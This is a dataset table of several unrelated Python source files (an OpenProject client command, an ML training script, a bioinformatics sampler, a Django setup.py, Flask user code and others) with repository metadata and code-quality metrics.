hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9fb6e449fa62cd3c86a16e60d01fcdd30c301e7a | 747 | py | Python | pyopenproject/business/services/command/time_entry/find_schema.py | webu/pyopenproject | 40b2cb9fe0fa3f89bc0fe2a3be323422d9ecf966 | [
"MIT"
] | 5 | 2021-02-25T15:54:28.000Z | 2021-04-22T15:43:36.000Z | pyopenproject/business/services/command/time_entry/find_schema.py | webu/pyopenproject | 40b2cb9fe0fa3f89bc0fe2a3be323422d9ecf966 | [
"MIT"
] | 7 | 2021-03-15T16:26:23.000Z | 2022-03-16T13:45:18.000Z | pyopenproject/business/services/command/time_entry/find_schema.py | webu/pyopenproject | 40b2cb9fe0fa3f89bc0fe2a3be323422d9ecf966 | [
"MIT"
] | 6 | 2021-06-18T18:59:11.000Z | 2022-03-27T04:58:52.000Z | from pyopenproject.api_connection.exceptions.request_exception import RequestError
from pyopenproject.api_connection.requests.get_request import GetRequest
from pyopenproject.business.exception.business_error import BusinessError
from pyopenproject.business.services.command.time_entry.time_entry_command import TimeEntryCommand
from pyopenproject.model.schema import Schema
class FindSchema(TimeEntryCommand):
def __init__(self, connection):
super().__init__(connection)
def execute(self):
try:
json_obj = GetRequest(self.connection, f"{self.CONTEXT}/schema").execute()
return Schema(json_obj)
except RequestError as re:
raise BusinessError("Error finding schema.") from re
| 39.315789 | 98 | 0.771084 | 83 | 747 | 6.722892 | 0.481928 | 0.15233 | 0.071685 | 0.107527 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156627 | 747 | 18 | 99 | 41.5 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0.056225 | 0.028112 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.357143 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
4cbc22c6d799e2812e523d82b271f4e49980e77c | 488 | py | Python | examples/experimental/pipelining.py | hhuuggoo/kitchensink | 1f81050fec7eace52e0b4e1b47851b649a4e4d33 | [
"BSD-3-Clause"
] | 2 | 2015-03-17T05:02:42.000Z | 2016-04-07T15:02:28.000Z | examples/experimental/pipelining.py | hhuuggoo/kitchensink | 1f81050fec7eace52e0b4e1b47851b649a4e4d33 | [
"BSD-3-Clause"
] | null | null | null | examples/experimental/pipelining.py | hhuuggoo/kitchensink | 1f81050fec7eace52e0b4e1b47851b649a4e4d33 | [
"BSD-3-Clause"
] | 1 | 2015-10-07T21:50:44.000Z | 2015-10-07T21:50:44.000Z | import logging
import time
import pandas as pd
import numpy as np
from kitchensink.clients.http import Client
from kitchensink.data import RemoteData
from kitchensink import settings
settings.setup_client("http://localhost:6323/")
c = Client(settings.rpc_url)
"""follow multi node instructions from README.md
"""
df = pd.DataFrame({'a' : np.arange(100000)})
remote = RemoteData(obj=df)
retval = remote.pipeline(prefix='pipeline_test')
print(retval)
print(c.data_info([remote.data_url]))
| 24.4 | 48 | 0.782787 | 71 | 488 | 5.309859 | 0.577465 | 0.119363 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022989 | 0.108607 | 488 | 19 | 49 | 25.684211 | 0.843678 | 0 | 0 | 0 | 0 | 0 | 0.082569 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
4cca86788d8edf09b1ebce371891d7dd5a5312f6 | 7,670 | py | Python | death/trashcan/trainerC.py | Fuchai/mayoehr | ec79d2157bedf4f4f0fc783d86523df8a758e27c | [
"MIT"
] | null | null | null | death/trashcan/trainerC.py | Fuchai/mayoehr | ec79d2157bedf4f4f0fc783d86523df8a758e27c | [
"MIT"
] | null | null | null | death/trashcan/trainerC.py | Fuchai/mayoehr | ec79d2157bedf4f4f0fc783d86523df8a758e27c | [
"MIT"
] | null | null | null | # import pandas as pd
# from archi.computer import Computer
# import torch
# import numpy
# import pdb
# from pathlib import Path
# import os
# from os.path import abspath
# from death.post.inputgen_planC import InputGen
# from torch.utils.data import DataLoader
# import torch.nn as nn
# import archi.param as param
# from torch.autograd import Variable
# import gc
#
# batch_size = 1
#
#
# class dummy_context_mgr():
# def __enter__(self):
# return None
#
# def __exit__(self, exc_type, exc_value, traceback):
# return False
#
# def save_model(net, optim, epoch):
# epoch = int(epoch)
# task_dir = os.path.dirname(abspath(__file__))
# pickle_file = Path(task_dir).joinpath("saves/DNCfull_" + str(epoch) + "_" + str(i) + ".pkl")
# pickle_file = pickle_file.open('wb')
# torch.save((net, optim, epoch), pickle_file)
#
#
# def load_model(computer):
# task_dir = os.path.dirname(abspath(__file__))
# save_dir = Path(task_dir) / "saves"
# highestepoch = -1
# highestiter = -1
# for child in save_dir.iterdir():
# epoch = str(child).split("_")[2]
# iteration = str(child).split("_")[3].split('.')[0]
# iteration=int(iteration)
# epoch = int(epoch)
# # some files are open but not written to yet.
# if epoch > highestepoch and iteration>highestiter and child.stat().st_size > 2048:
# highestepoch = epoch
# highestiter=iteration
# if highestepoch == -1 and highestiter == -1:
# return computer, None, -1
# pickle_file = Path(task_dir).joinpath("saves/DNCfull_" + str(highestepoch)+"_"+str(iteration) + ".pkl")
# print("loading model at ", pickle_file)
# pickle_file = pickle_file.open('rb')
# model, optim, epoch = torch.load(pickle_file)
#
# print('Loaded model at epoch ', highestepoch, 'iteartion', iteration)
#
# for child in save_dir.iterdir():
# epoch = str(child).split("_")[2].split('.')[0]
# iteration = str(child).split("_")[3].split('.')[0]
# if int(epoch) != highestepoch and int(iteration) != highestiter:
# os.remove(child)
# print('Removed incomplete save file and all else.')
#
# return model, optim, epoch
#
# def run_one_patient_one_step():
# # this is so python does garbage collection automatically.
# # we are debugging the
# pass
#
# def run_one_patient(computer, input, target, optimizer, loss_type, real_criterion,
# binary_criterion, validate=False, first=False):
#
# input = Variable(torch.Tensor(input).cuda())
# target = Variable(torch.Tensor(target).cuda())
#
# # we have no critical index, becuase critical index are those timesteps that
# # DNC is required to produce outputs. This is not the case for our project.
# # criterion does not need to be reinitiated for every story, because we are not using a mask
#
# time_length = input.size()[1]
# # with torch.no_grad if validate else dummy_context_mgr():
# patient_output = Variable(torch.Tensor(1, time_length, param.v_t)).cuda()
# for timestep in range(time_length):
# # first colon is always size 1
# feeding = input[:, timestep, :]
# output = computer(feeding)
# assert not (output!=output).any()
# patient_output[0, timestep, :] = output
#
# # patient_output: (batch_size 1, time_length, output_dim ~4000)
# time_to_event_output=patient_output[:,:,0]
# cause_of_death_output=patient_output[:,:,1:]
# time_to_event_target=target[:,:,0]
# cause_of_death_target=target[:,:,1:]
#
# patient_loss=None
#
# # this block will not work for batch input,
# # you should modify it so that the loss evaluation is not determined by logic but function.
# if loss_type[0]==0:
# # in record
# toe_loss = real_criterion(time_to_event_output,time_to_event_target)
# cod_loss = binary_criterion(cause_of_death_output,cause_of_death_target)
# patient_loss=toe_loss+cod_loss
# else:
# # not in record
# # be careful with the sign, penalize when and only when positive
# underestimation = time_to_event_target-time_to_event_output
# underestimation = nn.ReLU(underestimation)
# toe_loss = real_criterion(underestimation,0)
# cod_loss = binary_criterion(cause_of_death_output,cause_of_death_target)
# patient_loss=toe_loss+cod_loss
#
# if not validate:
# # TODO UNDERSTAND WHAT THE FLAG MEANS
# patient_loss.backward()
# optimizer.step()
#
# del input
# del target
#
# return patient_loss
#
#
# def train(computer, optimizer, real_criterion, binary_criterion,
# igdl, starting_epoch, total_epochs):
#
# for epoch in range(starting_epoch, total_epochs):
#
# for i, (input, target, loss_type) in enumerate(igdl):
#
# if i==0:
# train_story_loss = run_one_patient(computer, input, target, optimizer, loss_type,
# real_criterion,binary_criterion, first=True)
# else:
# train_story_loss = run_one_patient(computer, input, target, optimizer, loss_type,
# real_criterion,binary_criterion)
# computer.new_sequence_reset()
# gc.collect()
# del input, target, loss_type
# # torch.cuda.empty_cache()
# # print("#####################################")
# # print("printing all objects")
# # for obj in gc.get_objects():
# # try:
# # if torch.is_tensor(obj) or (hasattr(obj, 'data') and torch.is_tensor(obj.data)):
# # print(type(obj), obj.size())
# # except (OSError , ModuleNotFoundError, KeyError, NotImplementedError):
# # pass
#
# # if i % 100 == 0:
# print("learning. count: %4d, training loss: %.4f" %
# (i, train_story_loss[0]))
# # TODO No validation support for now.
# # val_freq = 16
# # if batch % val_freq == val_freq - 1:
# # print('summary. epoch: %4d, batch number: %4d, running loss: %.4f' %
# # (epoch, batch, running_loss / val_freq))
# # running_loss = 0
# # # also test the model
# # val_loss = run_one_story(computer, optimizer, story_length, batch_size, pgd, validate=False)
# # print('validate. epoch: %4d, batch number: %4d, validation loss: %.4f' %
# # (epoch, batch, val_loss))
#
# save_model(computer, optimizer, epoch)
# print("model saved for epoch ", epoch)
#
#
# if __name__=="__main__":
# total_epochs = 10
# lr = 1e-7
# optim = None
# starting_epoch = -1
#
# ig=InputGen()
# igdl=DataLoader(dataset=ig,batch_size=1,shuffle=False,num_workers=16)
#
# computer = Computer()
#
# # if load model
# # computer, optim, starting_epoch = load_model(computer)
#
# computer = computer.cuda()
# if optim is None:
# optimizer = torch.optim.Adam(computer.parameters(), lr=lr)
# else:
# print('use Adadelta optimizer with learning rate ', lr)
# optimizer = torch.optim.Adadelta(computer.parameters(), lr=lr)
#
# real_criterion=nn.SmoothL1Loss()
# binary_criterion=nn.BCEWithLogitsLoss()
#
# # starting with the epoch after the loaded one
#
# train(computer, optimizer, real_criterion, binary_criterion,
# igdl, int(starting_epoch) + 1, total_epochs)
| 38.737374 | 112 | 0.608605 | 920 | 7,670 | 4.866304 | 0.284783 | 0.020103 | 0.014742 | 0.031271 | 0.21644 | 0.184722 | 0.184722 | 0.157918 | 0.133795 | 0.114139 | 0 | 0.010827 | 0.26545 | 7,670 | 197 | 113 | 38.93401 | 0.783813 | 0.938592 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0.005076 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4ccaf2a923c6aa214769dc1a6e236dcc500eab3d | 2,791 | py | Python | scripts/site2samp.py | cz-ye/MetNet | 3711ca66fc43ffe051f9772e4ec5ec90b2a584b9 | [
"MIT"
] | null | null | null | scripts/site2samp.py | cz-ye/MetNet | 3711ca66fc43ffe051f9772e4ec5ec90b2a584b9 | [
"MIT"
] | null | null | null | scripts/site2samp.py | cz-ye/MetNet | 3711ca66fc43ffe051f9772e4ec5ec90b2a584b9 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
import sys, getopt
from Bio import SeqIO
from Bio.Seq import Seq
def generate_sample_seq(human_seq, mouse_seq, human_site, mouse_site, window, pos_sample, neg_sample):
i = 0
j = 0
print(len(human_seq))
print(len(mouse_seq))
flank = int(window)/2
for line in human_site.readlines():
temp = line.split('\t')
if temp[0] in human_seq:
if human_seq[temp[0]].seq[int(float(temp[1]))-1:int(float(temp[1]))+1] == 'AC':
before = -min(int(float(temp[1]))-flank-1, 0)
after = max(int(float(temp[1]))+flank-len(human_seq[temp[0]]), 0)
if int(float(temp[2])) == 1:
pos_sample.write(
'N'*before
+str(human_seq[temp[0]].seq[max(0, int(float(temp[1]))-flank-1):int(float(temp[1]))+flank])+
'N'*after+'\n')
elif int(float(temp[2])) == -1:
neg_sample.write(
'N'*before
+str(human_seq[temp[0]].seq[max(0,int(float(temp[1]))-flank-1):int(float(temp[1]))+flank])+
'N'*after+'\n')
else:
print("human wrong")
i+=1
else:
j+=1
print(i, j)
i = 0
j = 0
for line in mouse_site.readlines():
temp = line.split('\t')
if temp[0] in mouse_seq:
if mouse_seq[temp[0]].seq[int(float(temp[1]))-1:int(float(temp[1]))+1] == 'AC':
before = -min(int(float(temp[1]))-flank-1, 0)
after = max(int(float(temp[1]))+flank-len(mouse_seq[temp[0]]), 0)
if int(float(temp[2])) == 1:
pos_sample.write(
'N'*before
+str(mouse_seq[temp[0]].seq[max(0,int(float(temp[1]))-flank-1):int(float(temp[1]))+flank])
+'N'*after+'\n')
elif int(float(temp[2])) == -1:
neg_sample.write(
'N'*before
+str(mouse_seq[temp[0]].seq[max(0,int(float(temp[1]))-flank-1):int(float(temp[1]))+flank])
+'N'*after+'\n')
else:
print("mouse wrong")
i+=1
else:
j+=1
print(i, j)
return
def main(argv):
try:
opts, args = getopt.getopt(argv[1:], 'm:p:w:', ['mode=', 'path=', 'window='])
except getopt.GetoptError as err:
print(str(err))
sys.exit(2)
for o, a in opts:
if o in ('-m', '--mode'):
mode = a
if o in ('-p', '--path'):
path = a
if o in ('-w', '--window'):
window = a
mode2serial = {
'transcript_train': '0',
'transcript_test': '2',
'cdna_train': '1',
'cdna_test': '3'}
human_seq = SeqIO.to_dict(SeqIO.parse(path+"human_"+mode+'.txt', "fasta"))
mouse_seq = SeqIO.to_dict(SeqIO.parse(path+"mouse_"+mode+'.txt', "fasta"))
human_site = open(path+"human_pku"+mode2serial[mode], "r")
mouse_site = open(path+"mouse_pku"+mode2serial[mode], "r")
pos_sample = open(path+window+'/'+mode+"/p_samples", "w")
neg_sample = open(path+window+'/'+mode+"/n_samples", "w")
generate_sample_seq(human_seq, mouse_seq, human_site, mouse_site, window, pos_sample, neg_sample)
if __name__ == '__main__':
main(sys.argv)
| 27.91 | 102 | 0.602651 | 467 | 2,791 | 3.473233 | 0.175589 | 0.098644 | 0.147965 | 0.128237 | 0.635019 | 0.59926 | 0.59926 | 0.564735 | 0.564735 | 0.540074 | 0 | 0.030488 | 0.177356 | 2,791 | 99 | 103 | 28.191919 | 0.675958 | 0.007524 | 0 | 0.457831 | 1 | 0 | 0.083454 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.036145 | null | null | 0.084337 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4cd4609dffb156d76282a078d409e43fa656e910 | 555 | py | Python | setup.py | modgahead/django-periodic-tasks | 4ffe90c18fb77dce49658b294b7b090b258119a2 | [
"MIT"
] | 2 | 2018-02-25T18:31:59.000Z | 2020-04-30T11:23:57.000Z | setup.py | modgahead/django-periodic-tasks | 4ffe90c18fb77dce49658b294b7b090b258119a2 | [
"MIT"
] | null | null | null | setup.py | modgahead/django-periodic-tasks | 4ffe90c18fb77dce49658b294b7b090b258119a2 | [
"MIT"
] | 1 | 2020-05-01T09:54:54.000Z | 2020-05-01T09:54:54.000Z | from distutils.core import setup
setup(
name='django-periodic-tasks',
version='0.0.1',
packages=[
'periodic_tasks',
'periodic_tasks.migrations',
'periodic_tasks.management',
'periodic_tasks.management.commands',
],
package_dir={'': 'src'},
url='https://github.com/modgahead/django-periodic-tasks',
license='MIT',
author='Sergey Isayenko',
description='Periodic tasks app for Django',
install_requires=[
'Django>=1.8',
'croniter==0.3.16',
],
zip_safe=False
)
| 24.130435 | 61 | 0.616216 | 61 | 555 | 5.491803 | 0.672131 | 0.271642 | 0.113433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021028 | 0.228829 | 555 | 22 | 62 | 25.227273 | 0.761682 | 0 | 0 | 0.095238 | 0 | 0 | 0.452252 | 0.189189 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.047619 | 0 | 0.047619 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4cde658a1f9692b735ee78405c77302185b99630 | 921 | py | Python | src/backend/app_user_management/web_app_user.py | MatthewRizzo/timesheet_tracker | 4f492d7fe150430f899a7613e4d80af229db0ec9 | [
"MIT"
] | 2 | 2020-07-12T07:58:06.000Z | 2020-10-05T21:55:48.000Z | src/backend/app_user_management/web_app_user.py | MatthewRizzo/timesheet_tracker | 4f492d7fe150430f899a7613e4d80af229db0ec9 | [
"MIT"
] | 15 | 2020-07-15T19:24:42.000Z | 2022-01-20T00:55:09.000Z | src/backend/app_user_management/web_app_user.py | MatthewRizzo/timesheet_tracker | 4f492d7fe150430f899a7613e4d80af229db0ec9 | [
"MIT"
] | null | null | null | # -- External Packages -- #
from flask import Flask, redirect, flash
from flask_login import LoginManager, UserMixin
# -- Project Defined Imports -- #
from backend.backend_controller import BackendController
class WebAppUser(UserMixin):
"""Class defining what a "user" actually is.
\n:param send_to_client_func - The function from app_manager capable of sending messages up a socket to the frontend
\n:param user_unique_id - A unique id given to each user
"""
def __init__(self, username: str, password: str, user_unique_id, send_to_client_func):
# A user is mostly the backend controller wrapped around identifiers for the account
self.username = username
self.password = password
self.backend_controller = BackendController(send_to_client=send_to_client_func, username=self.username)
# Required by extension of UserMixin
self.id = user_unique_id | 43.857143 | 120 | 0.741585 | 123 | 921 | 5.349594 | 0.495935 | 0.036474 | 0.072948 | 0.072948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194354 | 921 | 21 | 121 | 43.857143 | 0.886792 | 0.436482 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.222222 | 0.333333 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 2 |
4ce2d8e61e0296c603b3e69e37f228f1e42f2d9e | 315 | py | Python | activity/tests/datetime_scoring_period_tests.py | moneypro/espn-api | 65fd0b18f2f62d20aa2ee1dd0bfd5cb3d92bdd01 | [
"MIT"
] | 4 | 2021-01-20T15:05:05.000Z | 2021-05-15T02:54:29.000Z | activity/tests/datetime_scoring_period_tests.py | moneypro/espn-api | 65fd0b18f2f62d20aa2ee1dd0bfd5cb3d92bdd01 | [
"MIT"
] | null | null | null | activity/tests/datetime_scoring_period_tests.py | moneypro/espn-api | 65fd0b18f2f62d20aa2ee1dd0bfd5cb3d92bdd01 | [
"MIT"
] | null | null | null | from datetime import date
from activity.datetime_scoring_period import DatetimeScoringPeriod
class DatetimeScoringPeriodTest:
def setup(self):
self.target = DatetimeScoringPeriod()
def test_sanity(self):
d = date(year=2021, month=10, day=24)
assert 6 == self.target.convert(d)
| 21 | 66 | 0.714286 | 37 | 315 | 6 | 0.702703 | 0.09009 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035857 | 0.203175 | 315 | 14 | 67 | 22.5 | 0.848606 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
4cef34acb18fc5c71d3f4cac0b2080ca82e206a9 | 384 | py | Python | yt_concate/pipeline/steps/postflight.py | kinslersi/yt-concate | b68a842138997c48bf605e9811cf47f0db2faaa6 | [
"MIT"
] | null | null | null | yt_concate/pipeline/steps/postflight.py | kinslersi/yt-concate | b68a842138997c48bf605e9811cf47f0db2faaa6 | [
"MIT"
] | null | null | null | yt_concate/pipeline/steps/postflight.py | kinslersi/yt-concate | b68a842138997c48bf605e9811cf47f0db2faaa6 | [
"MIT"
] | null | null | null | import os
import shutil
import logging
from yt_concate.pipeline.steps.step import Step
from yt_concate.setting import VIDEOS_DIR, CAPTIONS_DIR
class Postflight(Step):
def process(self, data, inputs, utils):
logger = logging.getLogger()
logger.info("in postflight")
if inputs["cleanup"] == "True":
shutil.rmtree(VIDEOS_DIR)
shutil.rmtree(CAPTIONS_DIR)
| 25.6 | 55 | 0.677083 | 49 | 384 | 5.183673 | 0.591837 | 0.047244 | 0.102362 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.223958 | 384 | 14 | 56 | 27.428571 | 0.852349 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
980c695d51dab28bcf2286d67c55fde0c3f561d3 | 260 | py | Python | TD/scripts/hooks.py | ulyssesdotcodes/vscode-ldjs | ac2c0300415f30fe3bbae41a62dc7f007c51fb83 | [
"BSD-3-Clause"
] | 13 | 2019-01-03T17:34:29.000Z | 2020-12-27T08:54:46.000Z | TD/scripts/hooks.py | ulyssesp/vscode-ldjs | ac2c0300415f30fe3bbae41a62dc7f007c51fb83 | [
"BSD-3-Clause"
] | 2 | 2021-10-05T19:55:56.000Z | 2022-02-17T19:01:08.000Z | TD/scripts/hooks.py | ulyssesp/vscode-ldjs | ac2c0300415f30fe3bbae41a62dc7f007c51fb83 | [
"BSD-3-Clause"
] | null | null | null | import time
def newJson(json):
print(op('container1/record')[0])
if op('container1/record')[0] == 1:
jsonRecord = op('json_record')
jsonRecord[0,0] = int(time.time())
jsonRecord[0,1] = json
op('json_record_out').par.write.pulse()
return
| 23.636364 | 43 | 0.646154 | 38 | 260 | 4.342105 | 0.5 | 0.145455 | 0.218182 | 0.230303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041475 | 0.165385 | 260 | 10 | 44 | 26 | 0.718894 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
981a78f293bba56a59977a034c7c8fe0c0bad22b | 663 | py | Python | givenergy_modbus/exceptions.py | dewet22/givenergy-modbus | 75e7ab7a7a6207c1b5efc2be5745bb393d9d840d | [
"Apache-2.0"
] | 3 | 2022-02-17T12:00:42.000Z | 2022-03-24T09:32:06.000Z | givenergy_modbus/exceptions.py | dewet22/givenergy-modbus | 75e7ab7a7a6207c1b5efc2be5745bb393d9d840d | [
"Apache-2.0"
] | 5 | 2022-01-24T15:25:17.000Z | 2022-03-17T18:17:24.000Z | givenergy_modbus/exceptions.py | dewet22/givenergy-modbus | 75e7ab7a7a6207c1b5efc2be5745bb393d9d840d | [
"Apache-2.0"
] | 5 | 2022-01-24T20:59:18.000Z | 2022-03-17T18:47:54.000Z | class ExceptionBase(Exception):
"""Base exception."""
message: str
def __init__(self, message: str) -> None:
super().__init__(message)
self.message = message
class InvalidPduState(ExceptionBase):
"""Thrown during PDU self-validation."""
def __init__(self, message: str, pdu) -> None:
super().__init__(message=message)
self.pdu = pdu
class InvalidFrame(ExceptionBase):
"""Thrown during framing when a message cannot be extracted from a frame buffer."""
frame: bytes
def __init__(self, message: str, frame: bytes) -> None:
super().__init__(message=message)
self.frame = frame
